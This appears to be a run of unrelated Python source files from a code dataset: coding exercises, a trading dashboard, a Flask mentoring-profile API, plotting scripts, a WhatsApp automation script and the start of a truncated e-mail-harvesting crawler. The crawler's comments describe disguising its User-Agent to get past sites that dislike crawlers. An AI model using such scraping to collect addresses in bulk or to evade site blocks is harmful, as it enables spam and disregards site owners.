4}))\n","sub_path":"leetcode/2020/linked-list-components.py","file_name":"linked-list-components.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"536022153","text":"# -*- coding: utf-8 -*-\nfrom multiprocessing import Process\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\n\nfrom zvt.charts.dcc_components import get_trader_detail_figures\nfrom zvt.charts.html_components import cls_to_input_list\nfrom zvt.composer import get_trader_classes\nfrom zvt.reader.business_reader import AccountReader, OrderReader\nfrom zvt.trader.examples import CoinTrader\n\n\ndef run_trader(trader):\n trader.run()\n\n\ndef process_run(trader):\n p = Process(target=run_trader, args=(trader,))\n p.start()\n\n\naccount_readers = {}\norder_readers = {}\n\napp = dash.Dash(__name__)\n\n# app.config['suppress_callback_exceptions'] = True\n\ntraders = get_trader_classes()\n\nconstructor_divs, constructor_states = cls_to_input_list(CoinTrader)\n\n\ndef serve_layout():\n layout = html.Div(\n [ # left\n html.Div([html.Div([html.Label('select trader:'),\n dcc.Dropdown(\n id='trader_selector',\n options=[{'label': trader[0], 'value': i} for i, trader in\n enumerate(traders)],\n value=0)\n ]),\n html.Div(id='trader_constructor', children=constructor_divs),\n html.Button('run the trader', id='btn_run_trader', n_clicks_timestamp=0),\n html.Div(id='trader_index', style={'display': 'none'})\n ],\n style={'width': '20%', 'display': 'inline-block'}),\n # right\n html.Div(id='trader_status',\n style={'width': '10%', 'display': 'inline-block'}),\n # right\n html.Div(id='trader_details',\n style={'width': '50%', 'display': 'inline-block'}),\n dcc.Interval(\n id='interval-component',\n interval=10 * 1000, # in milliseconds\n n_intervals=0\n )\n ]\n )\n\n return layout\n\n\napp.layout = serve_layout\n\n\n@app.callback(\n [Output('trader_constructor', 'children'),\n Output('trader_index', 'children')],\n [Input('trader_selector', 'value')])\ndef update_trader_constructor(trader_class_index):\n divs, _ = cls_to_input_list(traders[trader_class_index][1])\n return divs, trader_class_index\n\n\n@app.callback(\n Output('trader_status', 'children'),\n [Input('btn_run_trader', 'n_clicks')],\n constructor_states + [State('trader_index', 'children')])\ndef update_trader_status(n_clicks, security_list, 
exchanges, codes, start_timestamp, end_timestamp, provider, level,\n                         trader_name, real_time, kdata_use_begin_time, trader_index):\n    if n_clicks and (trader_index is not None):\n        if trader_name not in account_readers:\n            trader = traders[trader_index][1](security_list, exchanges, codes, start_timestamp, end_timestamp, provider,\n                                              level, trader_name, real_time, kdata_use_begin_time)\n            process_run(trader)\n            account_readers[trader.trader_name] = AccountReader(trader_names=[trader.trader_name], level=trader.level)\n            order_readers[trader.trader_name] = OrderReader(trader_names=[trader.trader_name])\n\n        return html.Label('trader {} is running'.format(trader_name))\n\n    return html.Label('trader status')\n\n\n@app.callback(Output('trader_details', 'children'),\n              [Input('interval-component', 'n_intervals')],\n              [State('trader_name', 'value')])\ndef update_trader_details(n, trader_name):\n    if trader_name is not None:\n        if trader_name in account_readers:\n            account_readers[trader_name].move_on(timeout=1)\n            order_readers[trader_name].move_on(timeout=1)\n            return get_trader_detail_figures(account_readers[trader_name], order_readers[trader_name])\n    return html.Label('trader details')\n\n\nif __name__ == '__main__':\n    app.run_server(debug=True)\n","sub_path":"zvt/trader_composer.py","file_name":"trader_composer.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"155264848","text":"import random\nimport time\n\ndef ustaw_znak(znak='-'):\n    def ramka(funkcja):\n        def wrapper():\n            print(znak * 35)\n            funkcja()\n            print(znak * 35)\n\n        return wrapper\n    return ramka\n\n@ustaw_znak('#')\ndef obliczenia():\n    # this function does nothing useful\n    print('computing', end='')\n    for _ in range(5):\n        print('.', end='', flush=True)\n        time.sleep(0.5)\n    print('done! 
the result is: ', random.randint(10, 100))\n\n\nif __name__ == '__main__':\n    obliczenia()\n    print()  # separate with a blank line\n    obliczenia()\n    print()\n    obliczenia()\n","sub_path":"Python - advanced/zajecia05/dek_adv.py","file_name":"dek_adv.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"342868545","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nimport time\nimport sys\n\n# Replace below path with the absolute path\n# to chromedriver in your computer\n#driver = webdriver.Chrome('./chromedriver')\ndriver = webdriver.Firefox()\n\n\ndriver.get(\"https://web.whatsapp.com/\")\nwait = WebDriverWait(driver, 600)\n\n# Replace 'Friend's Name' with the name of your friend\n# or the name of a group\ntarget = '\"Nabagata Saha\"'\n# Replace the below string with your own message\nstring = \"Hello sexy\"\n\ndef web_driver_quit():\n\tdriver.quit()\n\tquit()\n\ndef send_message(target, string):\n    x_arg = '//span[contains(@title,' + target.lower() + ')]'\n    group_title = wait.until(EC.presence_of_element_located((By.XPATH, x_arg)))\n    group_title.click()\n    message = driver.find_elements_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')[0]\n    message.send_keys(string)\n    sendbutton = driver.find_elements_by_xpath('//*[@id=\"main\"]/footer/div[1]/button')[0]\n    sendbutton.click()\n\nif __name__ == \"__main__\":\n    send_message(target, string)\n    alert1 = driver.switch_to.alert\n    alert1.accept()\n    web_driver_quit()\n","sub_path":"selSendMsg.py","file_name":"selSendMsg.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35519436","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: baibing\n@contact: 243061887(qq)\n@software: pycharm\n@file: 启动进程实现多人物.py\n@time: 7/3/19 4:26 PM\n@desc:\n'''\n\n'''\nThe multiprocessing library:\na cross-platform multiprocessing module that provides a Process class to represent a process\n\n'''\n\nfrom multiprocessing import Process\nimport os\nfrom time import sleep\n\n# child process code\ndef run(str):\n    while True:\n        print(\"pid: %s want run %s.... ppid:%s\"%(os.getpid(),str,os.getppid()))\n        sleep(1.2)\n\nif __name__ == \"__main__\":\n    print(\"main (parent) process starting...\")\n\n    p = Process(target=run,args=(\"yoyoyo\",))  # create a child process inside the current process; target is the task to run\n    # args holds the function's arguments as a tuple; a single argument needs a trailing comma\n    p.start()  # start the process\n\n    while True:\n        print(\"pid: %s from ice bai greeting\"% os.getpid())\n        sleep(1)","sub_path":"BaseLearning/进程/拷贝文件练习/file/3、启动进程实现多任务.py","file_name":"3、启动进程实现多任务.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653081199","text":"# Exercise 5: Assume that the paint coverage is 1 liter for every\n# 3 square meters and that paint is sold in 18-liter cans\n# costing R$ 80,00. 
Write a function that returns two values in a\n# tuple: the number of paint cans to buy and\n# the total price, given the size of a wall (in m²).\n\n\n# def paint_costs(area):\n#     can_price = 80\n#     required_liters = area / 3\n#     required_cans = required_liters // 18\n#     if required_liters % 18:\n#         required_cans += 1\n#     return required_cans, required_cans * can_price\n\n\nimport math\n\n\ndef paint_costs(area):\n    can_price = 80\n    required_liters = area / 3\n    required_cans = math.ceil(required_liters / 18)\n    return required_cans, required_cans * can_price\n\n\nprint(paint_costs(15))\n","sub_path":"modulo4_ciencia/bloco_33/dia_1/exercicio_dia/exercicio5.py","file_name":"exercicio5.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"365907223","text":"import datetime\nimport os\nimport uuid\nfrom http import HTTPStatus\nfrom typing import Tuple\n\nfrom cloudinary import uploader\nfrom dateutil.relativedelta import relativedelta\nfrom flask import Blueprint, current_app, jsonify, make_response, request\nfrom marshmallow import ValidationError\nfrom requests_toolbelt.utils import dump\nfrom sentry_sdk import capture_exception\nfrom sqlalchemy import func\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.sql import exists\n\nfrom .emails import (\n    send_faculty_login_email,\n    send_faculty_registration_email,\n    send_student_login_email,\n    send_student_registration_email,\n)\nfrom .models import (\n    ActivityOption,\n    ClinicalSpecialty,\n    ClinicalSpecialtyOption,\n    DegreeOption,\n    HospitalAffiliation,\n    HospitalAffiliationOption,\n    PartsOfMe,\n    PartsOfMeOption,\n    ProfessionalInterest,\n    ProfessionalInterestOption,\n    Profile,\n    ProfileActivity,\n    ProfileDegree,\n    VerificationEmail,\n    VerificationToken,\n    db,\n    get_verification_email_by_email,\n    save,\n)\nfrom .queries import matching_profiles\nfrom .schemas import profile_schema, profiles_schema, valid_email_schema\n\n\napi = Blueprint('api', __name__)\n\n\ndef get_token(headers):\n    token = headers.get('Authorization')\n\n    current_app.logger.info('Getting token from header %s', token)\n\n    if token is None:\n        return (\n            error_response(\n                {'token': ['unauthorized']}, status_code=HTTPStatus.UNAUTHORIZED.value\n            ),\n            None,\n        )\n\n    token_parts = token.split()\n\n    if token_parts[0].lower() != 'token' or len(token_parts) != 2:\n        return (\n            error_response(\n                {'token': ['bad format']}, status_code=HTTPStatus.UNAUTHORIZED.value\n            ),\n            None,\n        )\n\n    token_value = token_parts[1]\n\n    verification_token = VerificationToken.query.get(token_value)\n\n    if verification_token is None:\n        return (\n            error_response(\n                {'token': ['unknown token']}, status_code=HTTPStatus.UNAUTHORIZED.value\n            ),\n            None,\n        )\n\n    if _token_expired(verification_token):\n        login_timeout_status = 440\n\n        return (\n            error_response({'token': ['expired']}, status_code=login_timeout_status),\n            None,\n        )\n\n    return None, verification_token\n\n\ndef pagination(page):\n    size = 20\n\n    start = (page - 1) * size\n\n    end = start + size\n\n    return start, end\n\n\n@api.route('/api/profiles')\ndef get_profiles():\n    error, verification_token = get_token(request.headers)\n\n    if error:\n        return error\n\n    query = request.args.get('query')\n    degrees = request.args.get('degrees', '')\n    affiliations = request.args.get('affiliations', '')\n\n    page = int(request.args.get('page', 1))\n\n    start, end = pagination(page)\n\n    verification_email_id = VerificationToken.query.filter(\n        
VerificationToken.token == verification_token.token\n ).value(VerificationToken.email_id)\n\n queryset = (\n matching_profiles(query, degrees, affiliations)\n .order_by(\n # Is this the logged-in user's profile? If so, return it first (false)\n Profile.verification_email_id != verification_email_id,\n # Get the last word in the name.\n # Won't work with suffixes.\n func.split_part(\n Profile.name,\n ' ',\n func.array_length(\n func.string_to_array(\n func.regexp_replace(\n Profile.name, '(,|MD).*', ''\n ), # Remove suffixes after comma and MD\n ' ',\n ),\n 1, # How many words in the name\n ),\n ),\n )\n .group_by(Profile.id)\n )\n\n return jsonify(\n {\n 'profileCount': queryset.count(),\n 'profiles': profiles_schema.dump(queryset[start:end]),\n }\n )\n\n\n@api.route('/api/profiles/')\ndef get_profile(profile_id=None):\n profile = Profile.query.filter(Profile.id == profile_id).one_or_none()\n\n if profile is None:\n return error_response({'profile_id': ['Not found']}, 404)\n\n response = make_response(\n jsonify(\n profile_schema.dump(Profile.query.filter(Profile.id == profile_id).one())\n )\n )\n\n response.headers['Cache-Control'] = 'public, max-age=0'\n response.headers['Pragma'] = 'no-cache'\n response.headers['Expires'] = '0'\n\n return response\n\n\ndef error_response(reason, status_code=HTTPStatus.BAD_REQUEST.value):\n return jsonify(reason), status_code\n\n\ndef api_post(route):\n return api.route(f'/api/{route}', methods=['POST'])\n\n\ndef flat_values(values):\n return [tup[0] for tup in values]\n\n\ndef save_tags(profile, tag_values, option_class, profile_relation_class):\n activity_values = [value['tag']['value'] for value in tag_values]\n\n existing_activity_options = option_class.query.filter(\n option_class.value.in_(activity_values)\n )\n\n existing_activity_values = flat_values(existing_activity_options.values('value'))\n\n new_activity_values = [\n value for value in activity_values if value not in existing_activity_values\n ]\n\n new_activities = [option_class(value=value) for value in new_activity_values]\n\n db.session.add_all(new_activities)\n db.session.commit()\n\n existing_profile_relation_tag_ids = flat_values(\n profile_relation_class.query.filter(\n profile_relation_class.tag_id.in_(\n flat_values(existing_activity_options.values('id'))\n ),\n profile_relation_class.profile_id == profile.id,\n ).values('tag_id')\n )\n\n profile_relations = [\n profile_relation_class(tag_id=activity.id, profile_id=profile.id)\n for activity in existing_activity_options # All activities exist by this point\n if activity.id not in existing_profile_relation_tag_ids\n ]\n\n db.session.add_all(profile_relations)\n db.session.commit()\n\n\ndef save_all_tags(profile, schema):\n save_tags(\n profile, schema['affiliations'], HospitalAffiliationOption, HospitalAffiliation\n )\n save_tags(\n profile,\n schema['clinical_specialties'],\n ClinicalSpecialtyOption,\n ClinicalSpecialty,\n )\n save_tags(\n profile,\n schema['professional_interests'],\n ProfessionalInterestOption,\n ProfessionalInterest,\n )\n save_tags(profile, schema['parts_of_me'], PartsOfMeOption, PartsOfMe)\n save_tags(profile, schema['activities'], ActivityOption, ProfileActivity)\n save_tags(profile, schema['degrees'], DegreeOption, ProfileDegree)\n\n\ndef basic_profile_data(verification_token, schema):\n return {\n key: value\n for key, value in schema.items()\n if key\n not in {\n 'affiliations',\n 'clinical_specialties',\n 'professional_interests',\n 'parts_of_me',\n 'activities',\n 'degrees'\n # TODO should be `in` rather 
than `not in`\n }\n }\n\n\n@api_post('profile')\ndef create_profile():\n error, verification_token = get_token(request.headers)\n\n if error:\n return error\n\n try:\n schema = profile_schema.load(request.json)\n except ValidationError as err:\n capture_exception(err)\n return jsonify(err.messages), 422\n\n if db.session.query(\n exists().where(Profile.contact_email == schema['contact_email'])\n ).scalar():\n return error_response({'email': ['This email already exists in the database']})\n\n profile_data = {\n 'verification_email_id': verification_token.email_id,\n **basic_profile_data(verification_token, schema),\n }\n\n profile = Profile(**profile_data)\n\n db.session.add(profile)\n\n save_all_tags(profile, schema)\n\n return jsonify(profile_schema.dump(profile)), 201\n\n\n@api.route('/api/profiles/', methods=['PUT'])\ndef update_profile(profile_id=None):\n try:\n schema = profile_schema.load(request.json)\n except ValidationError as err:\n capture_exception(err)\n return jsonify(err.messages), 422\n\n profile = Profile.query.get(profile_id)\n\n error, verification_token = get_token(request.headers)\n\n if error:\n return error # TODO exceptions\n\n is_admin = VerificationEmail.query.filter(\n VerificationEmail.id == verification_token.email_id\n ).value(VerificationEmail.is_admin)\n\n current_app.logger.info('Edit to profile %s is_admin: %s', profile_id, is_admin)\n\n assert is_admin or profile.verification_email_id == verification_token.email_id\n\n profile_data = basic_profile_data(verification_token, schema)\n\n for key, value in profile_data.items():\n\n # TODO put this with the schema\n if key in {'name', 'contact_email'}:\n setattr(profile, key, value.strip())\n else:\n setattr(profile, key, value)\n\n try:\n save(profile)\n except IntegrityError:\n return jsonify({'error': 'Account with this contact email already exists'}), 400\n\n # TODO rather than deleting all, delete only ones that haven't changed\n profile_relation_classes = {\n ProfessionalInterest,\n ProfileActivity,\n HospitalAffiliation,\n PartsOfMe,\n ClinicalSpecialty,\n ProfileDegree,\n }\n for profile_relation_class in profile_relation_classes:\n profile_relation_class.query.filter(\n profile_relation_class.profile_id == profile.id\n ).delete()\n\n save_all_tags(profile, schema)\n\n return jsonify(profile_schema.dump(profile))\n\n\ndef generate_token():\n return str(uuid.uuid4())\n\n\n@api_post('upload-image')\ndef upload_image():\n data = request.data\n\n if not data:\n return error_response({'file': ['No image sent']})\n\n response = uploader.upload(\n data, eager=[{'width': 200, 'height': 200, 'crop': 'crop'}]\n )\n\n return jsonify({'image_url': response['eager'][0]['secure_url']})\n\n\ndef get_verification_email(\n email: str, is_mentor: bool\n) -> Tuple[VerificationEmail, bool]:\n existing_email = get_verification_email_by_email(email)\n\n if existing_email:\n return existing_email, False\n\n verification_email = VerificationEmail(email=email, is_mentor=is_mentor)\n\n save(verification_email)\n\n return verification_email, True\n\n\ndef save_verification_token(email_id, token, is_personal_device):\n verification_token = VerificationToken(\n email_id=email_id, token=token, is_personal_device=is_personal_device\n )\n\n save(verification_token)\n\n return verification_token\n\n\ndef send_token(verification_email, email_function, is_personal_device):\n current_app.logger.info('Invalidating token with id %s', verification_email.id)\n\n VerificationToken.query.filter(\n VerificationToken.email_id == 
verification_email.id\n ).update({VerificationToken.expired: True})\n\n token = generate_token()\n\n verification_token = save_verification_token(\n verification_email.id, token, is_personal_device\n )\n\n email_response = email_function(verification_email.email, token)\n\n email_log = dump.dump_all(email_response).decode('utf-8')\n\n verification_token.email_log = email_log\n\n return save(verification_token)\n\n\ndef process_send_verification_email(is_mentor):\n email_function = (\n send_faculty_registration_email\n if is_mentor\n else send_student_registration_email\n )\n\n try:\n schema = valid_email_schema.load(request.json)\n except ValidationError as err:\n capture_exception(err)\n return error_response(err.messages)\n\n email = schema['email'].lower()\n\n is_personal_device = schema['is_personal_device']\n\n existing_email = get_verification_email_by_email(email)\n\n if existing_email:\n return error_response({'email': ['claimed']})\n\n verification_email, _ = get_verification_email(email, is_mentor=is_mentor)\n\n send_token(\n verification_email,\n email_function=email_function,\n is_personal_device=is_personal_device,\n )\n\n return jsonify({'id': verification_email.id, 'email': email})\n\n\n@api_post('send-faculty-verification-email')\ndef send_faculty_verification_email():\n return process_send_verification_email(is_mentor=True)\n\n\n@api_post('send-student-verification-email')\ndef send_student_verification_email():\n return process_send_verification_email(is_mentor=False)\n\n\n@api_post('login')\ndef login():\n schema = valid_email_schema.load(request.json)\n\n if 'errors' in schema:\n return error_response(schema.errors)\n\n email = schema['email'].lower()\n\n is_personal_device = schema['is_personal_device']\n\n verification_email = VerificationEmail.query.filter(\n VerificationEmail.email == email\n ).one_or_none()\n\n if verification_email is None:\n return error_response({'email': ['unregistered']})\n\n email_function = (\n send_faculty_login_email\n if verification_email.is_mentor\n else send_student_login_email\n )\n\n send_token(\n verification_email,\n email_function=email_function,\n is_personal_device=is_personal_device,\n )\n\n return jsonify({'email': email})\n\n\ndef _token_expired(verification_token):\n hours_until_expiry = (\n 168 * 2 if verification_token.is_personal_device else TOKEN_EXPIRY_AGE_HOURS\n )\n\n expire_time = verification_token.date_created + relativedelta(\n hours=hours_until_expiry\n )\n\n if verification_token.expired:\n current_app.logger.info('token %s expired', verification_token.token)\n\n return True\n\n current_time = datetime.datetime.utcnow()\n\n expired = datetime.datetime.utcnow() > expire_time\n\n current_app.logger.info(\n 'current time %s versus expire time %s is expired? 
%s',\n current_time,\n expire_time,\n expired,\n )\n\n return expired\n\n\nTOKEN_EXPIRY_AGE_HOURS = int(os.environ.get('REACT_APP_TOKEN_EXPIRY_AGE_HOURS', 1))\n\n\n@api_post('verify-token')\ndef verify_token():\n token = request.json['token']\n\n query = VerificationToken.query.filter(VerificationToken.token == token)\n\n match = query.one_or_none()\n\n if match is None:\n return error_response({'token': ['not recognized']})\n\n if _token_expired(match):\n return error_response(\n {'token': ['expired']}, status_code=HTTPStatus.UNAUTHORIZED.value\n )\n\n match.verified = True\n\n save(match)\n\n verification_email = VerificationEmail.query.get(match.email_id)\n\n profile = get_profile_by_token(token)\n\n profile_id = profile.id if profile is not None else None\n\n available_for_mentoring = (\n profile.available_for_mentoring if profile is not None else None\n )\n\n return jsonify(\n {\n 'email': verification_email.email,\n 'is_mentor': verification_email.is_mentor,\n 'is_admin': verification_email.is_admin,\n 'profile_id': profile_id,\n 'available_for_mentoring': available_for_mentoring,\n }\n )\n\n\ndef get_profile_by_token(token):\n verification_token = VerificationToken.query.get(token)\n\n if verification_token is None:\n return None\n\n verification_email = VerificationEmail.query.get(verification_token.email_id)\n\n return Profile.query.filter(\n Profile.verification_email_id == verification_email.id\n ).one_or_none()\n\n\n@api_post('availability')\ndef availability():\n error, verification_token = get_token(request.headers)\n\n if error is not None:\n return error\n\n available = request.json['available']\n\n profile = get_profile_by_token(verification_token.token)\n\n profile.available_for_mentoring = available\n\n save(profile)\n\n return jsonify({'available': available})\n","sub_path":"server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374024413","text":"import numpy as np\nimport pandas as pd\nimport pickle\nfrom pathlib import Path\n\nimport statsmodels.api as sm\nfrom bokeh.layouts import row\nfrom bokeh.plotting import figure, show\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.io import export_png\n\nimport sys\n\n###############################################################################\ndir = Path(__file__).resolve().parents[2]\ncurrent_week = \"week\" + str(sys.argv[1])\n\npath = dir / \"output\" / current_week\npath.mkdir(parents=True, exist_ok=True)\n\n###############################################################################\n\ndef restrict(dataf, female=None):\n \n df_working = dataf[dataf[\"working_real\"]==1]\n \n if female==1:\n df_out = df_working[df_working[\"female_real\"]==1]\n elif female==0:\n df_out = df_working[df_working[\"female_real\"]==0]\n else:\n df_out = df_working\n \n return df_out\n\ndef get_unemp(dataf):\n dataf = dataf.copy()\n \n df_out = pd.DataFrame()\n df_out[\"emp_female\"] = dataf[dataf[\"female_real\"]==1].groupby(\"age_real\")[\"working_real\"].mean()\n df_out[\"n_female\"] = dataf[dataf[\"female_real\"]==1].groupby(\"age_real\")[\"working_real\"].count()\n\n df_out[\"emp_male\"] = dataf[dataf[\"female_real\"]==0].groupby(\"age_real\")[\"working_real\"].mean()\n df_out[\"n_male\"] = dataf[dataf[\"female_real\"]==0].groupby(\"age_real\")[\"working_real\"].count()\n \n return df_out\n\ndef group_age(dataf):\n dataf = dataf.copy()\n \n df_out = dataf.groupby(\"age_real\").median()\n 
df_out[\"n\"] = dataf.groupby(\"age_real\")[\"pid\"].count()\n return df_out\n\ndef make_pretty(p):\n p.xgrid.grid_line_color = None\n p.yaxis.minor_tick_line_width=0\n p.xaxis.minor_tick_line_width=0\n \n p.legend.location = \"bottom_right\"\n\n return p \n\n\ndef plot_sample(dataf, str_path, rest=False):\n \n if rest:\n dataf = restrict(dataf)\n else:\n dataf = dataf.copy()\n \n \n ll = dataf.groupby(\"period_ahead\")[\"pid\"].count().values\n x = np.arange(len(ll))\n \n p=figure(title=\"Number of people by length of observation\",\n y_range = (0, 5500))\n p.vbar(x, top=ll)\n \n p = make_pretty(p)\n \n export_png(p, filename=str(path / str_path))\n \ndef plot_sample_coeff(dataf, str_path):\n \n dataf = dataf.copy()\n dataf_rest = restrict(dataf)\n \n ll = dataf.groupby(\"period_ahead\")[\"pid\"].count().values\n ll_rest = dataf_rest.groupby(\"period_ahead\")[\"pid\"].count().values\n \n ll_coeff = ll_rest/ll\n x = np.arange(len(ll_coeff))\n \n p=figure(title=\"Fraction of people working by lenght of observation\",\n y_range=(0, 1))\n p.vbar(x, top=ll_coeff)\n \n p = make_pretty(p)\n export_png(p, filename=str(path / str_path))\n\n \ndef plot_by_age(dataf, str_path, rest=False):\n \n if rest:\n dataf = restrict(dataf)\n else:\n dataf = dataf.copy()\n \n ll = dataf.groupby(\"age_real\")[\"pid\"].count().values\n x = np.arange(len(ll)) + min(dataf[\"age_real\"])\n \n p=figure(title=\"Number of observed people by age\",\n y_range = (0, 2500))\n p.vbar(x, top=ll)\n \n p = make_pretty(p)\n export_png(p, filename=str(path / str_path))\n \ndef plot_2c(dataf, str_path):\n \n dataf = dataf.copy()\n \n df_group = dataf.groupby(\"pid\")[[\"working_real\", \"period_ahead\"]]\n \n # Getting mean of working years per person\n work = df_group.mean()[\"working_real\"]\n # Getting max amount of periods we observe a person\n obs = df_group.max()[\"period_ahead\"]\n \n # Concat those two frames\n df_combined = pd.concat([work, obs], axis=1)\n ll_mean = df_combined.groupby(\"period_ahead\").mean().values\n ll_median = df_combined.groupby(\"period_ahead\").median().values\n \n overall_mean = dataf[\"working_real\"].mean()\n \n x = np.arange(len(ll_mean))\n \n source = ColumnDataSource(data={\"x\": x,\n \"y_mean\": ll_mean,\n \"y_median\": ll_median,\n \"overall_mean\": np.repeat(overall_mean, len(ll_mean))})\n \n p=figure(title=\"Fraction of working years by length of observation\",\n y_range=(0, 1))\n \n p.line(x=\"x\", y=\"y_mean\", source=source,\n line_color=\"black\", line_dash=\"solid\", line_width=3,\n legend_label = \"mean\")\n \n # p.line(x=\"x\", y=\"y_median\", source=source,\n # line_color=\"black\", line_dash=\"dashed\", line_width=3,\n # legend_label = \"median\")\n \n p.line(x=\"x\", y=\"overall_mean\", source=source,\n line_color=\"red\", line_dash=\"solid\", line_width=2,\n legend_label = \"Overall mean\")\n \n p = make_pretty(p)\n export_png(p, filename=str(path/ str_path)) \n\n\nif __name__ == \"__main__\": \n df = pd.read_pickle(path / \"df_analysis_cohort\")\n \n \n plot_2c(df, \"fig2c.png\")\n plot_sample(df, \"sample_duration.png\")\n plot_sample(df, \"sample_duration_working.png\", rest=True)\n plot_sample_coeff(df, \"sample_duration_relative.png\")\n plot_by_age(df, \"sample_age.png\")\n plot_by_age(df, \"sample_age_working.png\", rest=True)\n\n\n","sub_path":"src/validation/sample_plots.py","file_name":"sample_plots.py","file_ext":"py","file_size_in_byte":5099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"454741500","text":"ipname = input(\"Enter the name of input file : \")\r\nip = open(ipname, \"r\")\r\no1 = \"Output \"\r\nextension = \".txt\"\r\noutputname = o1 + ipname[:-3] + extension\r\nout = open(outputname, \"w\")\r\n\r\nt = ip.readline();t=int(t)\r\n\r\nfor t_i in range(t):\r\n pc = ip.readline(); pc = list(pc);\r\n if(t_i!=t-1):\r\n pc = pc[:-1]\r\n count = 0\r\n lenth = len(pc)\r\n if lenth == 1 and pc[0]=='-':\r\n count=1\r\n elif lenth==1 and pc[0]=='+':\r\n count=0\r\n if(lenth>=2):\r\n for i in range(len(pc)-1):\r\n if(pc[i]!=pc[i+1]):\r\n count += 1\r\n if(pc[-1]=='-'):\r\n count += 1\r\n out.writelines(\"Case #%d: %d\\n\" % (t_i+1,count))\r\n\r\nip.close()\r\nout.close()\r\n","sub_path":"codes/CodeJamCrawler/16_0_2/dkrocks365/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"561648194","text":"# E-Mail-crawler\n# by Mark Schneemann\n#\n# Usage:\n# python3 mail-crawler.py -u \n# python3 mail-crawler.py -l #\n#\n# Optional: add -v for verbose mode\n#\n# Examples:\n# python3 mail-crawler.py 2 -u https://privacyscore.org\n# python3 mail-crawler.py 3 -l lists/InstitutionsOfHigherEducation.csv\n# ------------------------------ Config ------------------------------\n\n# Typical sites that contain email addresses.\n# Everything is lowercase.\nimport traceback\nimport tldextract\nimport argparse\nimport requests\nimport urllib\nimport urllib.request\nfrom parsers.RegexParser import RegexParser\nfrom parsers.MailtoParser import MailtoParser\nfrom loaders.SeleniumChromeLoader import SeleniumChromeLoader\npotential_sites_en = [\n \"impressum\", \"support\", \"contact\", \"imprint\", \"privacy\", \"imprint\"]\npotential_sites_de = [\"kontakt\", \"datenschutz\", \"über\"]\npotential_sites_debug = []\npotential_sites = set(potential_sites_en +\n potential_sites_de + potential_sites_debug)\n\n# ignored files\nignore_files = [\".exe\", \".png\", \".pdf\", \".jpg\"]\nignore_protocols = [\"mailto:\", \"tel:\", \"javascript:\"]\n\n# Header of the crawler.\n# Changed the User-Agent to old Mozilla - not everybody likes crawlers.\n# currently not used\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'\n}\n\n# enable loader\n\n# choose loader here:\n# RequestsLoader - Loads html by just using requests.get\n# (fast but no js and rendering)\n# SplashLoader - Loads rendered html by using a dockerized splash-browser\n# (slow but with js and rendering - has a ton of memory leaks)\n# SeleniumChromeLoader - Use webdriver and chrome in headless mode\nloader = SeleniumChromeLoader\n\n# enabled parsers\n# Cloudflare Protection (deprecated)\n# a href=\"mailto...\n# regex for something@something.something\n# look for spoken chars like at or [at] instead of @ (deprecated)\n# handle \"javascript:linkTo_UnCryptMailto...\" (deprecated)\nparsers = [MailtoParser, RegexParser]\n# --------------------------- Warning! --------------------------\n# ----------------- Don't read below this line! -----------------\n# ----------------------- Super ugly code! 
----------------------\n\n# import libraries\n\nVERBOSE = False\n\n\ndef build_url(baseurl, path):\n # Returns a list in the structure of urlparse.ParseResult\n url_base = urllib.parse.urlparse(baseurl)\n url_new = urllib.parse.urlparse(path)\n\n if url_new.scheme == \"\":\n url_new = url_new._replace(scheme=url_base.scheme)\n if url_new.netloc == \"\":\n url_new = url_new._replace(netloc=url_base.netloc)\n\n return urllib.parse.urlunparse(url_new)\n\n\ndef get_promising_urls(soup, base):\n global VERBOSE\n global potential_sites\n global ignore_files\n global ignore_protocols\n\n found_sites = list()\n counter = 0\n soup_links = set(soup.find_all('a', href=True))\n for link in soup_links:\n for site in potential_sites:\n if (link.string is not None and site in link.string.lower()) or site in str(link['href']).lower():\n if link['href'] not in found_sites:\n if VERBOSE:\n print(\"\\t\\tfound \" + site + \": \" + str(link['href']))\n new_link = link['href']\n\n ignored = False\n\n for p in ignore_protocols:\n if new_link.lower().strip().startswith(p):\n ignored = True\n\n for i in ignore_files:\n if new_link.lower().strip().endswith(i) and not ignored:\n ignored = True\n\n if not ignored:\n check_this_site = build_url(base, new_link)\n # do not crawl other domains\n base_domain = tldextract.extract(base).domain\n check_domain = tldextract.extract(\n check_this_site).domain\n if base_domain == check_domain and check_this_site != \"\":\n found_sites.append(check_this_site)\n return found_sites\n\n\ndef get_promising_mails(soup):\n global VERBOSE\n global parsers\n email_addresses = set()\n for parser in parsers:\n email_addresses = email_addresses | parser.extract_mail_addresses(\n soup, VERBOSE)\n\n return email_addresses\n\n\ndef process_url(target):\n global VERBOSE\n global loader\n\n try:\n # check for redirects (thanks aok!)\n request = requests.get(target, allow_redirects=True, 